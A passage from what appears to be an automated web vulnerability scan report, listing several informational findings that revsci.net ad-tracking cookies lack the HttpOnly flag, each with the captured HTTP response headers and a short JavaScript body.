Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhKRGZKRTjLTQMJBSE/72npTsNpRoMWq+9TTgWL2ZvvxerT8SkTMMg3mqCpBDmxZhu+yUoLnATqy/tiKdn75egfCW6/fUTnO7FXa+mttDWsXOHscmzGcdcNnz1ng2pZ45YSmYQE/BtirGwhwOlW2A2Iz0fG7TaF72idj+/rLuiklM7PR6nyU9duyBWNNA=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:04:36 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:04:36 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.202. http://pix04.revsci.net/I10985/b3/0/3/1008211/579855884.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/579855884.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EmhOHMQDruItGF29/x0GEv1FuZbSAKOIGTN8cJSum2Np/CoReJg2v9kDss6IjPbyobQAwvhLAH2SBYVS4Aca2ROPVNOf1VWh+hEqPiqU0bhReIUafnkll3Rq9pruA1HphVsEataiCU4UsktlzVfsKcjSNKUW1ejPUGnrIUMmJ/opL+XBEJqalRFxzz++kuS0r8FA3xbmxB0VW/Fj5TEabsOCs6WjLf8zGKgiUktukxMj4LRehj9yYi7ERIGSj2wgMLjYe9onk6Nwnq1w3cSQz3lezvtsbXogCw5eLcQk7BBWC7AW34FiS6I5I3AMgwXW1+vQct44E8GL/+uZkCF26JWxr4OFg1zCE1hL+og3Ccye+ofAbs5lQhLD9O83gErv0udsw/ULLAXaFrXjIiO+lA4jXrT+Ql6y65lgdTwb7TYQTBMO7cEQ8+JtiHkjuNuCqQrJrA3t1Ab11SQmEzmh1+QCx6igOMxs2lVuCTKOpLCvXWusFMASdzNqMIm1KLwwD840D4c7y3Rshr5o/BgIwNLJUAZ52Q2cRjtmFe+Zr6mqja6lLLnOAJfc5T253oyAq1j4VvExFVkpa4M3kMBXazOIbOJwTO0rd2IVV+hddDV35gc+cnDCJZgSt6tge7B7qFfWLJUvsHU7uuprAFoFQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:01:30 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EmhOHMQDruItGF29/x0GEv1FuZbSAKOIGTN8cJSum2Np/CoReJg2v9kDss6IjPbyobQAwvhLAH2SBYVS4Aca2ROPVNOf1VWh+hEqPiqU0bhReIUafnkll3Rq9pruA1HphVsEataiCU4UsktlzVfsKcjSNKUW1ejPUGnrIUMmJ/opL+XBEJqalRFxzz++kuS0r8FA3xbmxB0VW/Fj5TEabsOCs6WjLf8zGKgiUktukxMj4LRehj9yYi7ERIGSj2wgMLjYe9onk6Nwnq1w3cSQz3lezvtsbXogCw5eLcQk7BBWC7AW34FiS6I5I3AMgwXW1+vQct44E8GL/+uZkCF26JWxr4OFg1zCE1hL+og3Ccye+ofAbs5lQhLD9O83gErv0udsw/ULLAXaFrXjIiO+lA4jXrT+Ql6y65lgdTwb7TYQTBMO7cEQ8+JtiHkjuNuCqQrJrA3t1Ab11SQmEzmh1+QCx6igOMxs2lVuCTKOpLCvXWusFMASdzNqMIm1KLwwD840D4c7y3Rshr5o/BgIwNLJUAZ52Q2cRjtmFe+Zr6mqja6lLLnOAJfc5T253oyAq1j4VvExFVkpa4M3kMBXazOIbOJwTO0rd2IVV+hddDV35gc+cnDCJZgSt6tge7B7qFfWLJUvsHU7uuprAFoFQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:01:30 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:01:29 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.203. http://pix04.revsci.net/I10985/b3/0/3/1008211/602675862.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/602675862.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp7h79CrB4Ypq8bZnedKYjOdeMOLsfi9HQE4saI/5RCJ9y8KLVFBw8+lYpjeoXfA1XWRQVqFbpXIMebkFXbQTE0xZdhpXd5uEOtyRc5a9K0dGFurx7gbrpmSvOkvWFCio+FP0JQCTYI/GDlR49/dY9ZfMvjNnvHmhLSbOD53X/RpoOV+D6ALESZffv/i0W97GqjPQl/Kqwta7Xdie2YUVoBUFjm2t0nNgDo+J3dP7Gt3ux82wtMOhk5x6cxdWutYa3kuEk6WTSaxb70PIiEUKLccPI1VuCaDDvg1Edipckrskd1Nb6rxmRcc+f4M8WJ2UQMlHGOaxigcXc4y5OkRY6hyts5L0VV44xa9kOSOGtNl1XmFcb5itfqZcNSgUDe3KrPyZ8TiE7cd+rDIi6bGQAwxkT6iazM2fg6WACXbPyCvVQfzKy25O2Rfo4nUNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:27:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp7h79CrB4Ypq8bZnedKYjOdeMOLsfi9HQE4saI/5RCJ9y8KLVFBw8+lYpjeoXfA1XWRQVqFbpXIMebkFXbQTE0xZdhpXd5uEOtyRc5a9K0dGFurx7gbrpmSvOkvWFCio+FP0JQCTYI/GDlR49/dY9ZfMvjNnvHmhLSbOD53X/RpoOV+D6ALESZffv/i0W97GqjPQl/Kqwta7Xdie2YUVoBUFjm2t0nNgDo+J3dP7Gt3ux82wtMOhk5x6cxdWutYa3kuEk6WTSaxb70PIiEUKLccPI1VuCaDDvg1Edipckrskd1Nb6rxmRcc+f4M8WJ2UQMlHGOaxigcXc4y5OkRY6hyts5L0VV44xa9kOSOGtNl1XmFcb5itfqZcNSgUDe3KrPyZ8TiE7cd+rDIi6bGQAwxkT6iazM2fg6WACXbPyCvVQfzKy25O2Rfo4nUNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:27:35 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:27:35 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.204. http://pix04.revsci.net/I10985/b3/0/3/1008211/603496051.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/603496051.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPFJMOhOXMMVp94u+w/BbtOIGssYybrEIYgJmILsDQmufM9tNd4heJ7St7GX0DL0+fSjWL4XJG/NmHtFFZTHJrhAyDWa82kosKQcxXrWXnZ9nEjIXlwYOmjESzd9K1IVGd6yr0pIiCX3oOM0f+CYs2MLsSkzWzEMWf0Dk+vnMzjToirR+oqwo1fYxUnihSYL10mZ627ZmDsJv0qGr+x9IESn+gi06KDUANyZZamHRg1+kg7nPIWOKW59rU8VqpGQkiNFkNQ+nnETaiCV0VyhtGgmctLQkdAYPMG+jXXDNqBRltnr+K1SsA0KoSWLm27MmWCxuYgkbd2diaVR4aNMzb6TfrfkbpDAEs8CKGpUM4TQCV4eriWxzqA3nvNEvWovfZL30egkaVf9sCZNF62Xav+TZkm/QCFAMR47GMWR2zOrlrsimIH8qxmGyCyCPDrvW+1UO4Shots5vZJd6y5+6nIEkClYj0JmdY/nZDqii9Szmne8p1u0cswdBsKj2Vee1RKvmSTE/Zz57GCSlsXr+qOFnO5jJ2Id5hN6VCi8cDciF/ZX4Cs71KJ2qHUBLQyRxAKhOlVnN+lGd11ePCUCyoyqxCtbG6eC95RH9v496KovSxzm63+RtkWUDxjRPUfu+sGfTdHORhXbtAi0nSVQxHZKv09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:41:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJMOhOXMMVp94u+w/BbtOIGssYybrEIYgJmILsDQmufM9tNd4heJ7St7GX0DL0+fSjWL4XJG/NmHtFFZTHJrhAyDWa82kosKQcxXrWXnZ9nEjIXlwYOmjESzd9K1IVGd6yr0pIiCX3oOM0f+CYs2MLsSkzWzEMWf0Dk+vnMzjToirR+oqwo1fYxUnihSYL10mZ627ZmDsJv0qGr+x9IESn+gi06KDUANyZZamHRg1+kg7nPIWOKW59rU8VqpGQkiNFkNQ+nnETaiCV0VyhtGgmctLQkdAYPMG+jXXDNqBRltnr+K1SsA0KoSWLm27MmWCxuYgkbd2diaVR4aNMzb6TfrfkbpDAEs8CKGpUM4TQCV4eriWxzqA3nvNEvWovfZL30egkaVf9sCZNF62Xav+TZkm/QCFAMR47GMWR2zOrlrsimIH8qxmGyCyCPDrvW+1UO4Shots5vZJd6y5+6nIEkClYj0JmdY/nZDqii9Szmne8p1u0cswdBsKj2Vee1RKvmSTE/Zz57GCSlsXr+qOFnO5jJ2Id5hN6VCi8cDciF/ZX4Cs71KJ2qHUBLQyRxAKhOlVnN+lGd11ePCUCyoyqxCtbG6eC95RH9v496KovSxzm63+RtkWUDxjRPUfu+sGfTdHORhXbtAi0nSVQxHZKv09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:41:50 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:41:50 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.205. http://pix04.revsci.net/I10985/b3/0/3/1008211/609031637.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/609031637.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/woLigEF+ZbSAIEl+O6vsJSum2NB/leM3NskvAjloepK63+nuNl6zWuEUaXfqbTAIveV2fYtsdz6AozU2T5CyAg1xOFcbm4AWmnFDgRt82GnmKVUoRF9ghaEp8PJ7QkrtHOr81JWnaR4iWlk5WAn2qYgbPg+CuHVkg39afOkYiI0Ivo5G1HAluU01TMWk+NGDjM86NO3MTZV8xYt30W0MIixhetbvKlazunOtlTIXCAjmT6n0Iu50ISZ4nlDCHu0Phlq7Mdquaquc9MgO9Onat7SRNRSG0xD9KDSCokfusZjpgte0vyiOaoWnQl/LfBb4ge/uX+fGJsqyxIyh7muIdbmlQorpV5R0t1P7q10zagJ6xuF1uacvl56KYKzypf0Zw1L9uMJAxWRVgzegM82Mi9W/ZNXRM+EfaV6qz6m/ZYoAogtPka+xU3zwTvHQ7cimsoGkc/zKCrmhQrYOn3BlxY0P8hi9qyKsU5waiK/YsTVHLhovtcyX8hYUhv+Z7cf0ieKvzDYmvkKhNOBEt+pfLsa64t58Wq8nPtl9rq1Z261m41/8Tznd+lW911ePCUCykyqxCtbK5qB06XchvUu9dXdFAFnd2hBXbHGWocnvddNnbApNM5+im63RWuVYh/QBdckv08; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:08:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/woLigEF+ZbSAIEl+O6vsJSum2NB/leM3NskvAjloepK63+nuNl6zWuEUaXfqbTAIveV2fYtsdz6AozU2T5CyAg1xOFcbm4AWmnFDgRt82GnmKVUoRF9ghaEp8PJ7QkrtHOr81JWnaR4iWlk5WAn2qYgbPg+CuHVkg39afOkYiI0Ivo5G1HAluU01TMWk+NGDjM86NO3MTZV8xYt30W0MIixhetbvKlazunOtlTIXCAjmT6n0Iu50ISZ4nlDCHu0Phlq7Mdquaquc9MgO9Onat7SRNRSG0xD9KDSCokfusZjpgte0vyiOaoWnQl/LfBb4ge/uX+fGJsqyxIyh7muIdbmlQorpV5R0t1P7q10zagJ6xuF1uacvl56KYKzypf0Zw1L9uMJAxWRVgzegM82Mi9W/ZNXRM+EfaV6qz6m/ZYoAogtPka+xU3zwTvHQ7cimsoGkc/zKCrmhQrYOn3BlxY0P8hi9qyKsU5waiK/YsTVHLhovtcyX8hYUhv+Z7cf0ieKvzDYmvkKhNOBEt+pfLsa64t58Wq8nPtl9rq1Z261m41/8Tznd+lW911ePCUCykyqxCtbK5qB06XchvUu9dXdFAFnd2hBXbHGWocnvddNnbApNM5+im63RWuVYh/QBdckv08; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:08:58 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 19:08:57 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.206. http://pix04.revsci.net/I10985/b3/0/3/1008211/609523113.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/609523113.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOoqdYRjDKMaw1JOvD8NLJUiDLUJnRBnk1iCQEDVTjL0tuNsq1LBh4dQFP7CuHjAC6pOp24XOz79cZhBbBCL9bvUudrTRvEIroA4NCzad0MsU2sXKSNtkRN4Gq5YX61eqs9X5UFZL/+D9x3mdehfYmtLeN8ZUoZMH/G00T50TrJowfw2ZfmMOhr9IYyFfEOeSlom3PXZQItWBPEkrBxpYR9q/8EElbqGj8HG7JPcfRUU6WSSJXi3pG7800xiuwYalL797YznATh2rdj2WOPuc9qzIF++Sn8+IwHWOfhkwX9mWT9BZ2kuiv+/XVddD7B9l0yEa1PQuobXZ9UyLxLVpddgb+/7ZUh0fuWhRqwfiNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:40:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOoqdYRjDKMaw1JOvD8NLJUiDLUJnRBnk1iCQEDVTjL0tuNsq1LBh4dQFP7CuHjAC6pOp24XOz79cZhBbBCL9bvUudrTRvEIroA4NCzad0MsU2sXKSNtkRN4Gq5YX61eqs9X5UFZL/+D9x3mdehfYmtLeN8ZUoZMH/G00T50TrJowfw2ZfmMOhr9IYyFfEOeSlom3PXZQItWBPEkrBxpYR9q/8EElbqGj8HG7JPcfRUU6WSSJXi3pG7800xiuwYalL797YznATh2rdj2WOPuc9qzIF++Sn8+IwHWOfhkwX9mWT9BZ2kuiv+/XVddD7B9l0yEa1PQuobXZ9UyLxLVpddgb+/7ZUh0fuWhRqwfiNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:40:46 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:40:45 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.207. http://pix04.revsci.net/I10985/b3/0/3/1008211/61287048.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/61287048.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZPKJLGVy0b/FZGDDHvWZWoQFYW/Bxx6OKyvNtqrQYP/DuRMuCpad6JLNu5xR3q3Nz7Qafk8Wq0LRY+14yoBM4tWDmrZdvSSuqy1TjL0tuKvI8mNIoh7KrEbQwnjBb1/LfBb8nXVzAZA1i6C8Xdm0cMC9LidpZlbEH3XMd5Xgw4jfPzI/b7RAI4gMLDLzP+SdEy0AQx9DXaeNTmC2s6HbnJgfP+I0tgk7tyNj/CzYfV5FHctMqOrpkDoPgnKfInXmzo8eN7M6w6+YxBKDqMIqbxukpogdBn+UtZBuolunW41Y23J+N63iY00FAXcAE73YN/Dql57qFUu6dll9801fT3qLLPaNP+b9FIoBf32eAwseHayTwczmXBz1WltFamSD3GIRixAc8atcD/KfEOirCTjLCfULuN/9AbhoDQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:06:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZPKJLGVy0b/FZGDDHvWZWoQFYW/Bxx6OKyvNtqrQYP/DuRMuCpad6JLNu5xR3q3Nz7Qafk8Wq0LRY+14yoBM4tWDmrZdvSSuqy1TjL0tuKvI8mNIoh7KrEbQwnjBb1/LfBb8nXVzAZA1i6C8Xdm0cMC9LidpZlbEH3XMd5Xgw4jfPzI/b7RAI4gMLDLzP+SdEy0AQx9DXaeNTmC2s6HbnJgfP+I0tgk7tyNj/CzYfV5FHctMqOrpkDoPgnKfInXmzo8eN7M6w6+YxBKDqMIqbxukpogdBn+UtZBuolunW41Y23J+N63iY00FAXcAE73YN/Dql57qFUu6dll9801fT3qLLPaNP+b9FIoBf32eAwseHayTwczmXBz1WltFamSD3GIRixAc8atcD/KfEOirCTjLCfULuN/9AbhoDQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:06:16 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:06:16 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.208. http://pix04.revsci.net/I10985/b3/0/3/1008211/616476492.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/616476492.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vuj41246c95NOaRAsl5hE/RAIN0jCKWeIrwU7hjL6yZdj93XkHnxuY5dXdsfw5hXREUlMqNPwkFtFYTAJwanBh5yYsGo3OuU23g4Sg+m/4oPiiW7+wP+sVJlWRijizVDRqGD+7XWyoETDu18Mfh38sGaLcBo3I8QKLVIHNbs/aPybUAp6deZ4PBam+j59FVp3j+OlK6mRTtV96HqNd0fyLSobj39hOpsGmZ9PBCS6PKnceOCU88KZYLjs9D/ogMjd3GXexqu6MMY+wrZ69abotqDqceVMfHYfc+u2rmmXQ4kjNvvzLnMiPUxpeWc6y6IrrLSU0aP1/RHBvaBGvVfQk5WA2CVlofLvT7Y9pNS4wEX/g0OMG57+/q0VMPqW9uJ3RN9aKoReMYds9lT5peBWgS5ahBACNkesRy++rBErZAYD7SmpB6lcs/JNNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:25:18 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vuj41246c95NOaRAsl5hE/RAIN0jCKWeIrwU7hjL6yZdj93XkHnxuY5dXdsfw5hXREUlMqNPwkFtFYTAJwanBh5yYsGo3OuU23g4Sg+m/4oPiiW7+wP+sVJlWRijizVDRqGD+7XWyoETDu18Mfh38sGaLcBo3I8QKLVIHNbs/aPybUAp6deZ4PBam+j59FVp3j+OlK6mRTtV96HqNd0fyLSobj39hOpsGmZ9PBCS6PKnceOCU88KZYLjs9D/ogMjd3GXexqu6MMY+wrZ69abotqDqceVMfHYfc+u2rmmXQ4kjNvvzLnMiPUxpeWc6y6IrrLSU0aP1/RHBvaBGvVfQk5WA2CVlofLvT7Y9pNS4wEX/g0OMG57+/q0VMPqW9uJ3RN9aKoReMYds9lT5peBWgS5ahBAC